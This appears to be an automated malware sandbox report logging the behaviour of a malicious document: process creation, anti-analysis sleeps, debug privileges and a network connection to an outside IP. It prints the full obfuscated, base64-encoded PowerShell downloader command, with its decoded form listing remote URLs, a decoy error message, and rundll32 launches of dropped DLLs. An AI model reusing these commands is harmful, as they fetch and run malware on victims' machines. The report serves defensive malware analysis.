Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2094267927.0000000000284000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003278 mov eax, dword ptr fs:[00000030h] 7_2_10003278
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded sET-iTem vARIABle:4PuW ([TypE]("{0}{2}{4}{1}{3}" -f 'S','rect','YsT','ory','em.io.di')) ; sET-iteM variABle:3Wv ( [tYPe]("{4}{2}{5}{1}{0}{7}{3}{6}"-F 'Vic','SeR','TEM','A','Sys','.net.','nager','epOInTm') ) ;$Xlzio9j=$P85R + [char](33) + $Q68I;$L29H=(('K'+'07')+'Z'); ( VariAbLe 4PUw -ValUeoNl )::"C`REateDirEctO`Ry"($HOME + ((('uq'+'2Nd')+'cz'+('q'+'ybu')+('q'+'2H'+'af0_yn')+('uq'+'2')) -rEplaCe('u'+'q2'),[ChAR]92));$J73Y=(('K'+'46')+'V'); ( ITEm VaRiAble:3Wv).VALUe::"S`eC`URI`TyproTOcOL" = ('Tl'+('s1'+'2'));$E3_O=(('R'+'77')+'A');$Ifws2qi = ('P4'+'4G');$X31J=('B'+('5'+'8R'));$Rzmnpqs=$HOME+(('{'+'0}Ndczq'+'yb{0}H'+('a'+'f0')+'_yn{'+'0'+'}') -F [ChaR]92)+$Ifws2qi+'.d' + 'll';$B65A=('H'+('_'+'0X'));$Pzpxt0n='h' + 'tt' + 'p';$L5brdwf=(('x'+' [ sh '+'b:')+'//'+'m'+'i'+'cr'+'o'+'ne'+'ws'+'.'+'e'+('u/'+'c'+'ranksh')+'af'+('t-'+'pulley'+'-i5a'+'io/Tlp/')+'!x'+(' [ s'+'h ')+'b'+':'+'/'+('/o'+'fe')+('rt-'+'a'+'l.c')+'om'+'/'+'wp'+'-c'+('ontent'+'/'+'t'+'9hV')+'Vi'+'B'+('de/!'+'x [')+' s'+('h b://'+'tr'+'a'+'nsal')+('.'+'eu/')+'ne'+('tg'+'ear')+('-wi'+'f')+('i-q'+'zvv')+('4/1j7'+'X')+('Z'+'/!x ')+'['+(' '+'s'+'h b:/'+'/e-')+('wde'+'s'+'ign.e'+'u/w')+('oo'+'d-'+'stov')+'e-'+('x7'+'iww/R'+'1SMs1v/')+'!x'+(' '+'[ s')+('h'+' b')+':'+('//'+'r')+('el'+'ated'+'grou')+'pt'+'e'+'s'+('t.c'+'om')+('/'+'Ou')+'r'+('Ti'+'me/cule'+'TF')+('a'+'3v')+'/'+('!'+'x [ ')+('sh bs'+':')+'/'+('/ww'+'w.s')+('ch'+'m')+('uckfe'+'der'+'n')+('.i'+'n')+'f'+'o'+('/'+'refe'+'r')+'en'+('ce'+'/0H')+('lB
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sET-iTem vARIABle:4PuW ([TypE]("{0}{2}{4}{1}{3}" -f 'S','rect','YsT','ory','em.io.di')) ; sET-iteM variABle:3Wv ( [tYPe]("{4}{2}{5}{1}{0}{7}{3}{6}"-F 'Vic','SeR','TEM','A','Sys','.net.','nager','epOInTm') ) ;$Xlzio9j=$P85R + [char](33) + $Q68I;$L29H=(('K'+'07')+'Z'); ( VariAbLe 4PUw -ValUeoNl )::"C`REateDirEctO`Ry"($HOME + ((('uq'+'2Nd')+'cz'+('q'+'ybu')+('q'+'2H'+'af0_yn')+('uq'+'2')) -rEplaCe('u'+'q2'),[ChAR]92));$J73Y=(('K'+'46')+'V'); ( ITEm VaRiAble:3Wv).VALUe::"S`eC`URI`TyproTOcOL" = ('Tl'+('s1'+'2'));$E3_O=(('R'+'77')+'A');$Ifws2qi = ('P4'+'4G');$X31J=('B'+('5'+'8R'));$Rzmnpqs=$HOME+(('{'+'0}Ndczq'+'yb{0}H'+('a'+'f0')+'_yn{'+'0'+'}') -F [ChaR]92)+$Ifws2qi+'.d' + 'll';$B65A=('H'+('_'+'0X'));$Pzpxt0n='h' + 'tt' + 'p';$L5brdwf=(('x'+' [ sh '+'b:')+'//'+'m'+'i'+'cr'+'o'+'ne'+'ws'+'.'+'e'+('u/'+'c'+'ranksh')+'af'+('t-'+'pulley'+'-i5a'+'io/Tlp/')+'!x'+(' [ s'+'h ')+'b'+':'+'/'+('/o'+'fe')+('rt-'+'a'+'l.c')+'om'+'/'+'wp'+'-c'+('ontent'+'/'+'t'+'9hV')+'Vi'+'B'+('de/!'+'x [')+' s'+('h b://'+'tr'+'a'+'nsal')+('.'+'eu/')+'ne'+('tg'+'ear')+('-wi'+'f')+('i-q'+'zvv')+('4/1j7'+'X')+('Z'+'/!x ')+'['+(' '+'s'+'h b:/'+'/e-')+('wde'+'s'+'ign.e'+'u/w')+('oo'+'d-'+'stov')+'e-'+('x7'+'iww/R'+'1SMs1v/')+'!x'+(' '+'[ s')+('h'+' b')+':'+('//'+'r')+('el'+'ated'+'grou')+'pt'+'e'+'s'+('t.c'+'om')+('/'+'Ou')+'r'+('Ti'+'me/cule'+'TF')+('a'+'3v')+'/'+('!'+'x [ ')+('sh bs'+':')+'/'+('/ww'+'w.s')+('ch'+'m')+('uckfe'+'der'+'n')+('.i'+'n')+'f'+'o'+('/'+'refe'+'r')+'en'+('ce'+'/0H')+('lB Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJ